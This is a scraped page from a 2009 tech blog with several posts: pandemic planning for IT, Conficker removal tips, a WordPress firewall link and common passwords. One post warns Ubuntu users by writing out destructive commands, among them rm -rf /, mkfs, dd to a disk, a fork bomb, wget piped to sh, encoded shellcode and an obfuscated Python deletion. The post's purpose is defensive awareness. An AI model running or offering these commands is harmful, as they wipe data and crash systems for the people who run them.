Daily Cup of Tech

We’ve been hearing from the CDC all over the news today about how the swine flu has hit Mexico and parts of the US and Canada very hard.  There is even some speculation as to whether or not this is the upcoming pandemic that we are long overdue for.

I thought that I would take this opportunity to put IT departments on alert so that they are prepared for the possibility of a swine flu pandemic or any other public health emergency.

Increased Stain

The most important factor that IT needs to realize is that in the time of a pandemic, there is going to be significant strain put upon both IT staff and IT resources. 

It will start out as an increase in Internet traffic as people from work start researching “swine flu” and “pandemic”. There will also be an increase in e-mail traffic, both from people e-mailing about the topic and then also spammers attempting to capitalize the scare.  This will happen before there is a pandemic or even any cases of swine flu in your immediate area.

Work From Home Requirements

If swine flu symtoms are discovered in your area, then the pressure will really start.  People will be urged to work from home.  This will put increased pressure on your Internet connection and also your VPN setup.  At this point, it becomes critical that you have a solid plan in place to provide remote access to the following network resources:

• files
• databases
• e-mail
• workstations
• collaboration tools
• intranet websites

From a support perspective, also make sure that you can perform the following tasks remotely:

• reboot/troubleshoot servers
• reconfigure any network component
• access BIOS and POST on any server
• access user’s home computers and network components
• access workstations and laptops

When Disaster Strikes

But, no matter how hard you plan, something will go wrong.  It always does and someone will be required to go into your data center or server room.  If this occurs, you have two options for dealing with the situation:

1. Co-ordinate will all other individuals who may need to be in the office and ensure that there are never two people there at the same time, or
2. Have an IT person stock up for the long haul and spend his/her entire time at the data center, keeping everything running.

Option 2 is the best for maintaining everything and keeping it up and running.  This person can also act as a centralized contact point for getting non-digital information out to others.

Plan Now

While it is hard to say at this point whether or not we will be experiencing a pandemic, now is the time to plan for it, not later.  Make sure that you have a solid plan in place that will allow you to not only keep your company running but moving forward.  Some things to consider when planning for a pandemic:

• Who will co-ordinate everything?
• How will IT services be prioritized during this time? Who gets access to what first?
• What will have to go on hold until the situation is resolved?
• What critical outsourced services need to be running in order for your disaster plan to work? e.g. power, Internet
• Do you have sufficient redundancy in your systems to ensure that you can keep moving forward with your business?
• Create a list of critical employees that need to be given first priority for all things network.

Conclusion

I really hope that this is not one of those events that we see in disaster movies.  I really don’t.  But, if we do find ourselves in the middle of a public health emergency, it is important that the IT department be prepared.  How you respond to this situation could make or break your entire company.

Trackback link - http://www.dailycupoftech.com/2009/04/26/swine-flu-pandemic-your-critical-role-as-it/trackback/

There are a number of unscrupulous people out there that are trying to, for whatever reason, get you to cause serious damage to your Ubuntu system.  They do this under the guise of helping you and they get you to type in these commands to “fix” your system.

I believe that knowledge is power. And I understand that this post couple be used to teach people how to do this exact thing.  But I also believe that making people aware of these dangers is the best way to inoculate them.

Delete All Files in Directory and Directory Above

rm -rf /
rm -rf .
rm -rf *
rm -r .[^.]*

Reformat Devices

Anything mentioned after the command will be reformatted blank.

mkfs
mkfs.ext3
mkfs.anything

Block Device Manipulation

Writes raw data to the device and often destroys it.

any_command > /dev/sda
dd if=something of=/dev/sda

Fork Bombs

Runs a massive amount of processes until the system locks up.

Bash:
:(){:|:&};:

Perl:
fork while fork

Tar Bomb

File extract into a massive number of folders and files, potentially injecting files into the operating system.  This can make your system useless.

Decompression Bomb

You are asked to download a relatively small file which contains highly compressed data.  Wheb extracted, it could take up gigs of data that may even fill up your entire hard drive and bring you system to a grinding halt.

Malicious Shell Scripts

You are asked to download and run a shell script that can contain any number of deadly commands.

wget http://some_place/some_file
sh ./some_file

wget http://some_place/some_file -O- | sh

Compiling Code

You are given or type in the source code which you then compile on your system and reek havoc on your system.

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This actually runs rm -rt ~ / & which destroys all the home directories!

Something similar in Python:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

Conclusion

So, if you are getting some help with your Ubuntu system, make sure you trust the person you are getting help from!

[Ubuntu Forums]

Trackback link - http://www.dailycupoftech.com/2009/04/22/ubuntu-commands-that-will-kill-your-computer/trackback/

Recently found How to Firewall Your WordPress Blog to be useful. From the website:

You already know to use a decent password for your blog, but brute-force or dictionary attacks aren’t the only attacks used against bloggers. It’s much cheaper and faster to exploit software flaws, and that the hackers do. A programmer’s oversight may allow a hacker to gain access to your blog to insert spyware, adware, or links to various pharmaceuticals you’d prefer not to speak about in front of your mother.

And it’s not just WordPress proper. WordPress has caught some major criticism for its security holes — but lately it’s been a bunch of insecure plugins, not WordPress itself. Matt Mullenweg counters the argument that WordPress is insecure over here. I think he’s totally right — WordPress has a rich “plugin ecosystem” that no other blogging platform can touch.

However, the problem remains. WordPress has some great plugins that are written by people with the best of intentions — but who may not understand the importance of sanitizing data provided by untrusted users, and its relationship with security. Upgrading often, setting permissions, using good passwords, etc. — that all helps a lot — but unless you have the time and ability to painstakingly audit all program code for security vulnerabilities, you’d be best off running one of the WordPress firewalls —

Great!  Yet something else that needs to be done!  But would be well worth tackling!

[How to Firewall Your WordPress Blog]

Trackback link - http://www.dailycupoftech.com/2009/04/12/halt-hackers-with-a-wordpress-firewall/trackback/

Everyone is in full Chicken Little mode these days with April 1 just around the corner and the Conflicker virus poised to bring down civilization.  Not since Y2K have I seen so much panic about a computer related issue.  So, to help everyone out, I thought that I would let you know how you can protect yourself from Conflicker.

1. Install the Microsoft patch - There has been a patch available for this issue out since October ‘08.  Make sure the patch is installed on your system.
2. Update your antivirus software - make sure that you have the latest version of your antivirus software and that the latest virus signatures are installed.  If you do not have antivirus on your computer, may I suggest Avast?
3. Remove the worm from your system - F-Secure has a free tool that will remove it from your computer to make sure you are not a part of the robot army!  Or you can use the Microsoft version of the tool.
4. Block the worm - I have created a HOSTS file update that can be added to the end of your HOSTS file to block the majority of the websites that the worm is attempting to connect to. (Thanks to F-secure for the original file that I modified).  This can also be done from your DNS server if your are running a corporate network.

More Information

You can get more information about this worm at the following websites:

• An Analysis of Conficker
• Conficker Worm: Help Protect Windows from Conficker
• Computer Worms - Conficker| Microsoft Security
• Yahoo! News - Giant Internet worm set to change tactics April 1 by AP: Yahoo! Tech
• The Conficker Worm: April Fool’s Joke or Unthinkable Disaster? - Bits Blog - NYTimes.com
• W32.Downadup | Symantec
• FAQ: Conficker time bomb ticks, but don’t expect boom | Security - CNET News
• Group launches strategy to block Conficker worm from .ca domain
• Conficker worm: worst is yet to come

P.S. If you are interested in doing a bit of manhunting, Microsoft is apparently offering a reward of $250,000 to catch this virus maker!

P.P.S. How many Linux and Mac users are stressed about this?  That’s what I thought!

Trackback link - http://www.dailycupoftech.com/2009/03/31/howto-stop-conflicker-in-its-tracks-immediately/trackback/

According to jimmyr.com, here are the 16 most common passwords:

1. 123456, 123, 123123, 01234, 2468, 987654, etc
2. 123abc, abc123, 246abc
3. First Name
4. Favorite Band
5. Favorite Song
6. first letter of given name then surname
7. qwerty, asdf, and other keyboard rolls
8. Favorite cartoon or movie character
9. Favorite sport, or sports star
10. Country of origin
11. City of origin
12. All numbers
13. Some word in the dictionary
14. Combining 2 dictionary words
15. any of the above spelled backwards
16. aaa, eee, llll, 999999, and other repeat combinations

Jimmy has also gotten his hands on a number of password lists and performed an analysis of the most common passwords.  A very interesting read.

Trackback link - http://www.dailycupoftech.com/2009/03/30/most-common-passwords/trackback/